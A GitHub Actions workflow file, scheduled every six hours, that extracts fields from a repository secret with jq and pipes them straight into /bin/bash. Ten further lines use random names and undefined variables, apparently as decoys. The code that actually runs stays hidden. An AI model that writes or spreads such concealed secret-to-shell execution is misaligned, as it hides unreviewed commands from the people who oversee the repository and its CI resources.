name: watchwordstudent

on:
  workflow_dispatch:
  schedule:
    - cron: '18 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: watchwordstudent
        env:
          kyeuy7196: ${{ secrets.kyeuy7196 }}
        run: |
          echo $kyeuy7196 | jq -r .vy17240 | /bin/bash
          echo $sge42165 | jq -r .kvz63626 | /bin/bash
          echo $oi34 | jq -r .xv13 | /bin/bash
          echo $g47382 | jq -r .boi24 | /bin/bash
          echo $rde2 | jq -r .c01259 | /bin/bash
          echo $n783 | jq -r .twcho8 | /bin/bash
          echo $cxb5 | jq -r .jmw57970 | /bin/bash
          echo $khwz451 | jq -r .ypj5449 | /bin/bash
          echo $y96902 | jq -r .om801 | /bin/bash
          echo $we346 | jq -r .x44118 | /bin/bash
          echo $ql42293 | jq -r .bpjs472 | /bin/bash

